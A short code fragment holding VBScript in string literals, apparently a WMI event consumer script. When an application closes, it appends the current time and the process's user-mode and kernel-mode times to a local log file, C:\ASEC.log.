"Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
" 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
" Entry made by: ASEC\"\nobjFile.WriteLine"
" \"Application closed. UserModeTime: \" & "
"TargetEvent.TargetInstance.UserModeTime &_\n"
"\"; KernelModeTime: \" & "
"TargetEvent.TargetInstance.KernelModeTime "
"& \" [hundreds of nanoseconds]\"\n"
"objFile.Close\n";
};